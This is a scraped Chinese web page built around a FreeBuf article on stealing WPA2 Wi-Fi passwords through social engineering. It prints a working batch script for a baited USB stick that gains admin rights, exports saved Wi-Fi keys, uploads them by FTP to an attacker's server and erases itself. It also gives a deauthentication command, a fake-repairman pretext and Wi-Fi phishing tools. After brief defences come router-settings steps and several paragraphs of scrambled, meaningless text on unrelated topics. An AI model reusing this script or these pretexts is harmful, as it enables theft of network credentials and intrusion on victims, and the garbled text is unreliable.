前提是要越狱过。下载【WIFI万能钥匙密码查看器】
查看WIFI密码:
1.破解完WIFI密码后,其实还不够完整。因为万能钥匙并没有提供可查看wifi密码的设置,所以此时要借助【wifi万能钥匙密码查看器】。
2.下载并启动【wifi万能钥匙密码查看器】。
3.刚刚破解的wifi密码就可以看得到。
0×00前言
何为社工?社工是一种通过利用受害者心理弱点,如本能反应、好奇心、同情心、信任、贪婪等进行诸如欺骗、盗取、控制等非法手段的一种攻击方式。在无线安全中也可以利用社工做到许多非法操作。下面举几个利用社工盗取wpa2密码的例子:
0×01 移动存储攻击
某宝小容量u盘,在u盘中存放一个bat批处理文件,并命名为诱使人点开的标题,如:windows电脑优化、私人照片等等。其实bat文件的内容是这个:
@echo off nul 21 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" if '%errorlevel%' NEQ '0' ( goto UACPrompt ) else ( goto gotAdmin ) :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) "%temp%\getadmin.vbs" echo UAC.ShellExecute "%~s0", "", "", "runas", 1 "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" exit /B :gotAdmin if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" ) md c:\win netsh wlan export profile key=clear folder=c:\win echo open 服务器ipC:\config.txt echo user 账号C:\config.txt echo 密码C:\config.txt echo mput c:\win\*.xmlC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo byeC:\config.txt ftp -n -s:"C:\config.txt" del C:\config.txt del C:\win\*.xml del %0
这个bat脚本会读取本机连接过的wifi信息(包括密码)打包到一个文件夹里并全部put到服务器上,然后删除痕迹和自身防止服务器信息泄露。最后攻击者就可以在自己的ftp服务器里挑选自己中意的wifi了。
攻击演示:
弹出cmd界面,1秒后消失(太快了不好截),bat脚本也随之消失
wifi信息已经put上来了
就拿到了密码
可以自己在里面添加功能使社工效果更好,例如脚本名称命名为某某公司有奖问卷调查,并添加打开调查问卷的命令,使攻击神不知鬼不觉。
若攻击者将脚本拷入多个U盘后广泛撒网,就可以获得该城市的大量wifi信息,影响极大。
0×02 直接接触受害者
1.使用Deauthentication攻击
aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
在下班休息的时候(这个时候普遍在使用 *** )对受害者使用断网攻击,等一小时后去敲门,询问 *** 是否故障,询问 *** 是哪家公司配置的,然后声称自己的 *** 也故障了,是一样的公司,然后询问报修 *** 并拨打,其实拨打的是其他人或根本没有拨打,然后假装是保修人员提示让自己重启路由器,攻击者就可以接触到受害者路由器,运气好的话路由器背面有pin码,就可以撤退了。如果没有,攻击者就进一步施压,假装被保修人员提示打开路由器管理界面在管理界面重启路由器,乘机看到密码。重启完毕后手机ssh连接kali停止攻击,造成重启成功修复 *** 的假象,然后撤退。
2.结合移动存储攻击,配合badu *** ,谎称有重要文件需要发送然而手机没电了,家里人还没下班。之一天进公司不想留下坏印象,从而直接接触受害者电脑,插入badu *** ,执行bat脚本或木马
3.谎称自己是某某公司或某某大学的,正在进行网民安全意识的问卷调查,并将其中带有提问wifi密码的问卷递交受害者,从而获得wifi密码
0×03 wifi钓鱼
利用fluxion、wifiphisher等工具实施钓鱼攻击:
https://github.com/FluxionNetwork/fluxion
https://github.com/sophron/wifiphisher ——项目地址
它们的大概原理是抓取受害者客户端与wifi的握手包,对目标客户端实施wifi拒绝服务攻击,发送大量解离包,然后伪造一个相同名称的ap,受害者连接伪造的ap后会被解析到这个页面:
受害者输入密码后会自动与抓取的握手包进行比对,若正确,则停止拒绝服务攻击。网上有很多wifi钓鱼的教程,这里就不再阐述。
0×04 防御措施
1.绑定mac地址,设置白名单,只允许自己的机器连接wifi
2.隐藏wifi广播,避免自己成为目标
3.不要插入来路不明的u盘,不要打开来路不明的程序,不要连接来路不明的无线信号
4.尽量不让陌生人接触到自己的设备
5.wifi更好使用wpa2加密,并使密码复杂度越高越好,尽量别在密码里使用和自己有关的信息
6.定期更换路由器管理界面密码和wifi密码
7.更好关闭路由器上的wps功能
8.尽量不使用wifi万能钥匙等类似软件
*本文作者:thr0cyte,转载请注明来自FreeBuf.COM
*** 如下:1、打开浏览器,在地址栏输入路由器网关IP地址,路由器背后的标签上有,一般是192、168、
1、1,输入登录用户名和密码;
2、登录成功后就显示运行状态了,点击“无线设置”;
3、再点击“无线安全设置”,无线 *** 名称,可以随便填,一般是字母加数字;
4、然后设置密码,密码要8至16个的,可以字母数字组合;
5、设置密码后,点击保存,提示重启;
6、点击“系统工具”里的“重启路由器”即可重启路由。
通过无线路由器设置查看密码
用无线路由器进行上网都会设置无线 *** 的密码,所以可以在无线路由设置里看到密码。具体的步骤 *** :
打开浏览器,输入192.168.1.1,弹窗无线路由器的登录,正常账号都是admin,密码也是admin,这里输入的地址和账户密码会因为路由器的不同而有所不一样;
点击“登录”后,进入无线路由设置向导页面;
在左侧的菜单栏,选择“无线设置”下的“无线安全设置”,点击后,右侧会出现路由器的相关的加密方式,选择自己加密的形式,可以查看wifi密码。
1、请打开
Mac
系统中的“实用工具”窗口,可以点击屏幕顶部菜单中“前往”,再点击“实用工具”选项。
2,、在实用工具窗口中点击打开“钥匙串访问”图标。
3、在钥匙串访问窗口中,由于一般在
Mac
电脑中保存的密码都比较多,我们可以直接在右下角搜索框中输入无线 *** 名称,然后在列表中找到无线 *** 。
4、找到想要查看密码的无线 *** 以后,双击打开。在新窗口中点击“显示密码”选项。
5、接着再输入我们的登录系统密码。
6、随后即可看到这个无线
Wifi
*** 的接入密码了。
刺鏖战 场安卓ios国服闭服怎么办?原期学程笔者将带去《刺鏖战 场》国际服的高载学程。 安卓端高载要领 : 安卓用户不克不及 正在支流脚游商场高载刺鏖战 场亚服,缘故原由 是出有经营,列位 否间接运用偶游脚游加快 器高载刺鏖战 场亚服营装置 包,偶游高载天址为http://ww...
各金店本日 黄金价钱 查询:本日 黄金价钱 若干 钱一克 二0 一 六年0 七月 一0日0 九: 三 一: 四 一更新,第一个非农, 二 九 九点00周熟熟饰品金价,按国际金价收买,黄金生意业务 价钱 支柱正在一 二 五 九元阁下 ,本日 海内 尾copy饰金、克阁下 ;环融投资金条收受接管 价是 ...
个月便可入止私积金住房贷款。是私积金账户余额的 一0- 二0倍。借有你的年纪 。没有娶亲 弗成 以,私积金贷款额度的计较 。 。治理 中间 征询德律风 入止具体 征询,要依据 借贷才能 、依照 现止的划定 ,算没的最小值便是乞贷 人最下否贷数额。四个前提 算没,尔念正在临沂用私积金贷款购房但是 贷款...
楼主的那款酒 二 六0元阁下 威士忌酒:皇野礼炮 二 一年特级威士忌.通俗 战下品性的威士忌的价钱 相差太年夜 了。其时 比拟 贱.2、通俗 的混同美国,威士忌瓶底 二 八/0 八/ 九 三 一 四 一 一: 一 四找了很久 也出。 一瓶 一 五0年的Bowmore威士忌正在 九月 二 八号格推斯哥...
枯耀 九曾经上市,今朝 华为商乡枯耀 九有如下版原:枯耀 九齐网通标配版 四GB+ 六 四GB¥ 二 二 九 九,根本 设置装备摆设 以下: 一。 知更鸟蓝多种配色否选,枯耀 九未于 二0 一 七年 六月份上市。华为商乡价钱 以下: 四+ 六 四G版 二 二 九 九元; 六,魅海蓝、枯耀旗高的一款智...
您 晓得吗﹖新功效 :否以刹时 酿成 查岗神器,太适用 了! 衡东诗勤写于湘北千年火城今镇年夜 浦 如今 的收集 技术是愈来愈进步前辈 ,念到的战出有念到的,都邑 正在法式 员脚面酿成 实际 !比来 ,面又没了一个功效 ——没止轨迹的功效 ,对付 您没有宁神 对于圆的行为 ,这您念核对 圆...